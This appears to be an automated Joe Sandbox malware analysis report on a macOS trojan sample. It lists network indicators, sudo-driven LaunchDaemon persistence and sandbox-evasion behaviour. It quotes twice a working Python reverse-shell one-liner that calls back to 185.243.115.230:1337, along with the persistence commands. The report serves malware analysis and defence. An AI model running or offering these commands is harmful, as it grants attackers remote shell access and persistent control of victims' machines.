Joe Sandbox Cloud Pro Analysis Report

Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:23.0.0
Analysis ID:56289
Start time:07:35:59
Joe Sandbox Product:Cloud
Start date:03.07.2018
Overall analysis duration:0h 6m 48s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:g70Ei8kMg7
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Mac Mini, High Sierra 10.13.2 (MS Office 16.9, Java 1.8.0_25)
Detection:MAL
Classification:mal60.troj.expl.mac@0/3@0/0

Detection

StrategyScoreRangeReportingDetection
Threshold600 - 100Report FP / FNmalicious

Classification

Signature Overview

Click to jump to signature section


Networking:

barindex
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.0.50:49275 -> 185.243.115.230:1337
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 185.243.115.230
Source: unknownTCP traffic detected without corresponding DNS query: 185.243.115.230
Source: unknownTCP traffic detected without corresponding DNS query: 185.243.115.230
Source: unknownTCP traffic detected without corresponding DNS query: 185.243.115.230
Source: unknownTCP traffic detected without corresponding DNS query: 185.243.115.230
Source: unknownTCP traffic detected without corresponding DNS query: 185.243.115.230
Source: unknownTCP traffic detected without corresponding DNS query: 185.243.115.230
Source: unknownTCP traffic detected without corresponding DNS query: 185.243.115.230
Source: unknownTCP traffic detected without corresponding DNS query: 185.243.115.230
Source: unknownTCP traffic detected without corresponding DNS query: 185.243.115.230
Source: unknownTCP traffic detected without corresponding DNS query: 185.243.115.230
Source: unknownTCP traffic detected without corresponding DNS query: 185.243.115.230
Source: unknownTCP traffic detected without corresponding DNS query: 185.243.115.230
Source: unknownTCP traffic detected without corresponding DNS query: 185.243.115.230
Source: unknownTCP traffic detected without corresponding DNS query: 185.243.115.230
Source: unknownTCP traffic detected without corresponding DNS query: 185.243.115.230
Source: unknownTCP traffic detected without corresponding DNS query: 185.243.115.230
Source: unknownTCP traffic detected without corresponding DNS query: 185.243.115.230
Source: unknownTCP traffic detected without corresponding DNS query: 185.243.115.230
Source: unknownTCP traffic detected without corresponding DNS query: 185.243.115.230
Source: unknownTCP traffic detected without corresponding DNS query: 185.243.115.230
Reads from file descriptors related to (network) socketsShow sources
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 552)Reads from socket in process: dataJump to behavior
Urls found in memory or binary dataShow sources
Source: g70Ei8kMg7String found in binary or memory: file://
Source: g70Ei8kMg7String found in binary or memory: http://a
Source: g70Ei8kMg7String found in binary or memory: http://code.google.com/p/closure-compiler/wiki/SourceMaps
Source: g70Ei8kMg7String found in binary or memory: http://en.wikipedia.org/wiki/ANSI_escape_code#graphics
Source: g70Ei8kMg7String found in binary or memory: http://invisible-island.net/ncurses/terminfo.ti.html#toc-_Specials
Source: g70Ei8kMg7String found in binary or memory: http://invisible-island.net/xterm/ctlseqs/ctlseqs.html
Source: g70Ei8kMg7String found in binary or memory: http://narwhaljs.org)
Source: g70Ei8kMg7String found in binary or memory: http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js
Source: g70Ei8kMg7String found in binary or memory: http://stackoverflow.com/a/5501711/3561
Source: g70Ei8kMg7String found in binary or memory: http://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3F
Source: g70Ei8kMg7String found in binary or memory: http://www.3waylabs.com/nw/WWW/products/wizcon/vt220.html
Source: g70Ei8kMg7String found in binary or memory: http://www.ecma-international.org/ecma-262/5.1/#sec-15.1.3.4
Source: g70Ei8kMg7String found in binary or memory: http://www.ecma-international.org/publications/standards/Ecma-262.htm)
Source: g70Ei8kMg7String found in binary or memory: http://www.example.com
Source: g70Ei8kMg7String found in binary or memory: http://www.iana.org/assignments/tls-extensiontype-values
Source: g70Ei8kMg7String found in binary or memory: http://www.midnight-commander.org/browser/lib/tty/key.c
Source: g70Ei8kMg7String found in binary or memory: http://www.openssl.org/support/faq.html
Source: g70Ei8kMg7String found in binary or memory: http://www.openssl.org/support/faq.htmlRAND_get_rand_methodRAND_init_fipsSSLEAY_RAND_BYTESdual
Source: g70Ei8kMg7String found in binary or memory: http://www.squid-cache.org/Doc/config/half_closed_clients/
Source: g70Ei8kMg7String found in binary or memory: http://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt
Source: g70Ei8kMg7String found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=25916
Source: g70Ei8kMg7String found in binary or memory: https://console.spec.whatwg.org
Source: g70Ei8kMg7String found in binary or memory: https://console.spec.whatwg.org/#clear
Source: g70Ei8kMg7String found in binary or memory: https://console.spec.whatwg.org/#count
Source: g70Ei8kMg7String found in binary or memory: https://encoding.spec.whatwg.org
Source: g70Ei8kMg7String found in binary or memory: https://github.com/antirez/linenoise
Source: g70Ei8kMg7String found in binary or memory: https://github.com/chalk/ansi-regex/blob/master/index.js
Source: g70Ei8kMg7String found in binary or memory: https://github.com/joyent/node/issues/1707
Source: g70Ei8kMg7String found in binary or memory: https://github.com/joyent/node/issues/3295.
Source: g70Ei8kMg7String found in binary or memory: https://github.com/nodejs/http2
Source: g70Ei8kMg7String found in binary or memory: https://github.com/nodejs/node-v0.x-archive/pull/7178
Source: g70Ei8kMg7String found in binary or memory: https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4
Source: g70Ei8kMg7String found in binary or memory: https://github.com/nodejs/node/issues/1264.
Source: g70Ei8kMg7String found in binary or memory: https://github.com/nodejs/node/issues/13435
Source: g70Ei8kMg7String found in binary or memory: https://github.com/nodejs/node/issues/2006
Source: g70Ei8kMg7String found in binary or memory: https://github.com/nodejs/node/issues/2119
Source: g70Ei8kMg7String found in binary or memory: https://github.com/nodejs/node/issues/3392
Source: g70Ei8kMg7String found in binary or memory: https://github.com/nodejs/node/pull/11513
Source: g70Ei8kMg7String found in binary or memory: https://github.com/nodejs/node/pull/12342
Source: g70Ei8kMg7String found in binary or memory: https://github.com/nodejs/node/pull/13870#discussion_r124515293
Source: g70Ei8kMg7String found in binary or memory: https://github.com/nodejs/node/pull/14389/files#r128522202
Source: g70Ei8kMg7String found in binary or memory: https://github.com/nodejs/node/pull/1771#issuecomment-119351671
Source: g70Ei8kMg7String found in binary or memory: https://github.com/nodejs/node/pull/3394
Source: g70Ei8kMg7String found in binary or memory: https://github.com/nodejs/node/wiki/Intl
Source: g70Ei8kMg7String found in binary or memory: https://github.com/v8/v8/blob/d6ead37d265d7215cf9c5f768f279e21bd170212/src/js/prologue.js#L152-L156
Source: g70Ei8kMg7String found in binary or memory: https://goo.gl/t5IS6M).
Source: g70Ei8kMg7String found in binary or memory: https://heycam.github.io/webidl/#dfn-class-string
Source: g70Ei8kMg7String found in binary or memory: https://heycam.github.io/webidl/#dfn-default-iterator-object
Source: g70Ei8kMg7String found in binary or memory: https://heycam.github.io/webidl/#dfn-iterator-prototype-object
Source: g70Ei8kMg7String found in binary or memory: https://heycam.github.io/webidl/#es-iterable
Source: g70Ei8kMg7String found in binary or memory: https://heycam.github.io/webidl/#es-iterable-entries
Source: g70Ei8kMg7String found in binary or memory: https://heycam.github.io/webidl/#es-iterators
Source: g70Ei8kMg7String found in binary or memory: https://heycam.github.io/webidl/#es-operations
Source: g70Ei8kMg7String found in binary or memory: https://heycam.github.io/webidl/#es-stringifier
Source: g70Ei8kMg7String found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#ascii-serialisation-of-an-origin
Source: g70Ei8kMg7String found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#concept-origin-opaque
Source: g70Ei8kMg7String found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding
Source: g70Ei8kMg7String found in binary or memory: https://mxr.mozilla.org/mozilla/source/netwerk/protocol/http/src/nsHttpHeaderArray.cpp
Source: g70Ei8kMg7String found in binary or memory: https://nodejs.org/
Source: g70Ei8kMg7String found in binary or memory: https://nodejs.org/download/release/v9.2.1/node-v9.2.1-headers.tar.gz
Source: g70Ei8kMg7String found in binary or memory: https://nodejs.org/download/release/v9.2.1/node-v9.2.1.tar.gz
Source: g70Ei8kMg7String found in binary or memory: https://nodejs.org/download/release/v9.2.1/node-v9.2.1.tar.gzheadersUrlhttps://nodejs.org/download/r
Source: g70Ei8kMg7String found in binary or memory: https://tc39.github.io/ecma262/#sec-%iteratorprototype%-object
Source: g70Ei8kMg7String found in binary or memory: https://tc39.github.io/ecma262/#sec-object.prototype.tostring
Source: g70Ei8kMg7String found in binary or memory: https://tools.ietf.org/html/rfc3492#section-3.4
Source: g70Ei8kMg7String found in binary or memory: https://tools.ietf.org/html/rfc3986#section-3.2.2
Source: g70Ei8kMg7String found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.2
Source: g70Ei8kMg7String found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.6
Source: g70Ei8kMg7String found in binary or memory: https://tools.ietf.org/html/rfc7540#section-8.1.2.5
Source: g70Ei8kMg7String found in binary or memory: https://url.spec.whatwg.org/#cannot-have-a-username-password-port
Source: g70Ei8kMg7String found in binary or memory: https://url.spec.whatwg.org/#concept-url
Source: g70Ei8kMg7String found in binary or memory: https://url.spec.whatwg.org/#concept-url-origin
Source: g70Ei8kMg7String found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-byte-serializer
Source: g70Ei8kMg7String found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-parser
Source: g70Ei8kMg7String found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-serializer
Source: g70Ei8kMg7String found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams-stringification-behavior
Writes from file descriptors related to (network) socketsShow sources
Source: /bin/ps (PID: 555)Writes from socket in process: dataJump to behavior
Source: /bin/ps (PID: 558)Writes from socket in process: dataJump to behavior
Source: /bin/ps (PID: 561)Writes from socket in process: dataJump to behavior
Source: /bin/ps (PID: 564)Writes from socket in process: dataJump to behavior
Source: /bin/ps (PID: 567)Writes from socket in process: dataJump to behavior
Source: /bin/ps (PID: 571)Writes from socket in process: dataJump to behavior

System Summary:

barindex
Classification labelShow sources
Source: classification engineClassification label: mal60.troj.expl.mac@0/3@0/0

Persistence and Installation Behavior:

barindex
Executes the "sudo" command used to execute a command as another userShow sources
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 553)Sudo executable: /usr/bin/sudo -> /usr/bin/sudo -S -p #node-sudo-passwd# chown root /tmp/script.shJump to behavior
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 556)Sudo executable: /usr/bin/sudo -> /usr/bin/sudo -S -p #node-sudo-passwd# chmod +x /tmp/script.shJump to behavior
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 559)Sudo executable: /usr/bin/sudo -> /usr/bin/sudo -S -p #node-sudo-passwd# mv /tmp/script.sh /var/root/Jump to behavior
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 562)Sudo executable: /usr/bin/sudo -> /usr/bin/sudo -S -p #node-sudo-passwd# mv /tmp/com.startup.plist /Library/LaunchDaemons/Jump to behavior
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 565)Sudo executable: /usr/bin/sudo -> /usr/bin/sudo -S -p #node-sudo-passwd# chown root /Library/LaunchDaemons/com.startup.plistJump to behavior
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 568)Sudo executable: /usr/bin/sudo -> /usr/bin/sudo -S -p #node-sudo-passwd# launchctl load -w /Library/LaunchDaemons/com.startup.plistJump to behavior
Executes commands using a shell command-line interpreterShow sources
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 555)Shell command executed: /bin/sh -c ps -eo pid,commJump to behavior
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 558)Shell command executed: /bin/sh -c ps -eo pid,commJump to behavior
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 561)Shell command executed: /bin/sh -c ps -eo pid,commJump to behavior
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 564)Shell command executed: /bin/sh -c ps -eo pid,commJump to behavior
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 567)Shell command executed: /bin/sh -c ps -eo pid,commJump to behavior
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 571)Shell command executed: /bin/sh -c ps -eo pid,commJump to behavior
Executes the "chmod" command used to modify permissionsShow sources
Source: /usr/bin/sudo (PID: 557)Chmod executable: /bin/chmod -> chmod +x /tmp/script.shJump to behavior
Executes the "chown" command used to modify ownership and group ownershipShow sources
Source: /usr/bin/sudo (PID: 554)Chown executable: /usr/sbin/chown -> chown root /tmp/script.shJump to behavior
Source: /usr/bin/sudo (PID: 566)Chown executable: /usr/sbin/chown -> chown root /Library/LaunchDaemons/com.startup.plistJump to behavior
Executes the "ps" command used to list the status of processesShow sources
Source: /bin/sh (PID: 555)Ps executable: /bin/ps -> ps -eo pid,commJump to behavior
Source: /bin/sh (PID: 558)Ps executable: /bin/ps -> ps -eo pid,commJump to behavior
Source: /bin/sh (PID: 561)Ps executable: /bin/ps -> ps -eo pid,commJump to behavior
Source: /bin/sh (PID: 564)Ps executable: /bin/ps -> ps -eo pid,commJump to behavior
Source: /bin/sh (PID: 567)Ps executable: /bin/ps -> ps -eo pid,commJump to behavior
Source: /bin/sh (PID: 571)Ps executable: /bin/ps -> ps -eo pid,commJump to behavior
Executes the "python" command used to interpret Python scriptsShow sources
Source: /bin/bash (PID: 572)Python executable: /usr/bin/python -> python -c import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('185.243.115.230',1337)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(['/bin/sh','-i'])Jump to behavior
Source: /bin/bash (PID: 574)Python executable: /usr/bin/python -> python -c import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('185.243.115.230',1337)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(['/bin/sh','-i'])Jump to behavior
Explicitly loads/starts launch servicesShow sources
Source: /usr/bin/sudo (PID: 569)Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.startup.plistJump to behavior
Writes shell script files to diskShow sources
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 552)Shell script file created: /private/tmp/script.shJump to dropped file
Reads data from the local random generatorShow sources
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 552)Random device file read: /dev/urandomJump to behavior
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 552)Random device file read: /dev/urandomJump to behavior
Sample contains user paths that might be useful for attributionShow sources
Source: initial sampleString containing user path: /Users/zeit/pkg-fetch/precompile/node/out/Release/obj/gen/src/inspector/protocol/Protocol.cpp
Source: initial sampleString containing user path: /Users/zeit/pkg-fetch/precompile/node/out/Release/obj/gen/node_javascript.cc
Uses the Python frameworkShow sources
Source: /usr/bin/python (PID: 572)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Source: /usr/bin/python (PID: 574)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Writes property list (.plist) files to diskShow sources
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 552)XML plist file created: /private/tmp/com.startup.plistJump to dropped file

Boot Survival:

barindex
Creates memory-persistent launch servicesShow sources
Source: /bin/mv (PID: 563)Launch agent/daemon created with KeepAlive and/or RunAtLoad, file moved: /tmp/com.startup.plist -> /Library/LaunchDaemons/com.startup.plistJump to behavior
Creates system-wide 'launchd' managed services aka launch daemonsShow sources
Source: /bin/mv (PID: 563)Launch daemon created file moved: /tmp/com.startup.plist -> /Library/LaunchDaemons/com.startup.plistJump to behavior

Malware Analysis System Evasion:

barindex
Executes the "sleep" command used to delay execution and potentially evade sandboxesShow sources
Source: /bin/bash (PID: 573)Sleep executable: /bin/sleep -> sleep 5Jump to behavior
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: g70Ei8kMg7Binary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE

Language, Device and Operating System Detection:

barindex
Reads process information of other processesShow sources
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.552 -> queries PID 552Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.549 -> queries PID 549Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.547 -> queries PID 547Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.543 -> queries PID 543Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.541 -> queries PID 541Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.540 -> queries PID 540Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.515 -> queries PID 515Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.513 -> queries PID 513Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.512 -> queries PID 512Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.510 -> queries PID 510Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.509 -> queries PID 509Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.473 -> queries PID 473Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.465 -> queries PID 465Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.456 -> queries PID 456Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.430 -> queries PID 430Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.429 -> queries PID 429Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.428 -> queries PID 428Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.427 -> queries PID 427Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.426 -> queries PID 426Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.425 -> queries PID 425Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.424 -> queries PID 424Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.419 -> queries PID 419Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.418 -> queries PID 418Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.414 -> queries PID 414Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.402 -> queries PID 402Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.399 -> queries PID 399Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.398 -> queries PID 398Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.397 -> queries PID 397Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.396 -> queries PID 396Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.395 -> queries PID 395Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.393 -> queries PID 393Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.392 -> queries PID 392Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.391 -> queries PID 391Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.388 -> queries PID 388Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.384 -> queries PID 384Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.383 -> queries PID 383Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.382 -> queries PID 382Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.381 -> queries PID 381Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.378 -> queries PID 378Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.377 -> queries PID 377Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.375 -> queries PID 375Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.373 -> queries PID 373Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.372 -> queries PID 372Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.371 -> queries PID 371Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.370 -> queries PID 370Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.366 -> queries PID 366Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.365 -> queries PID 365Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.364 -> queries PID 364Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.363 -> queries PID 363Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.362 -> queries PID 362Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.359 -> queries PID 359Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.357 -> queries PID 357Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.356 -> queries PID 356Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.355 -> queries PID 355Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.354 -> queries PID 354Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.353 -> queries PID 353Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.351 -> queries PID 351Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.350 -> queries PID 350Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.349 -> queries PID 349Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.347 -> queries PID 347Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.346 -> queries PID 346Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.345 -> queries PID 345Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.343 -> queries PID 343Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.342 -> queries PID 342Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.341 -> queries PID 341Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.340 -> queries PID 340Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.337 -> queries PID 337Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.336 -> queries PID 336Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.335 -> queries PID 335Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.327 -> queries PID 327Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.326 -> queries PID 326Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.325 -> queries PID 325Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.324 -> queries PID 324Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.323 -> queries PID 323Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.322 -> queries PID 322Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.321 -> queries PID 321Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.320 -> queries PID 320Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.319 -> queries PID 319Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.318 -> queries PID 318Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.317 -> queries PID 317Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.316 -> queries PID 316Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.315 -> queries PID 315Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.313 -> queries PID 313Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.311 -> queries PID 311Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.309 -> queries PID 309Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.308 -> queries PID 308Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.307 -> queries PID 307Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.306 -> queries PID 306Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.305 -> queries PID 305Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.304 -> queries PID 304Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.303 -> queries PID 303Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.301 -> queries PID 301Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.300 -> queries PID 300Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.299 -> queries PID 299Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.298 -> queries PID 298Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.296 -> queries PID 296Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.295 -> queries PID 295Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.294 -> queries PID 294Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.291 -> queries PID 291Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.287 -> queries PID 287Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.286 -> queries PID 286Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.285 -> queries PID 285Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.284 -> queries PID 284Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.282 -> queries PID 282Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.280 -> queries PID 280Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.279 -> queries PID 279Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.278 -> queries PID 278Jump to behavior
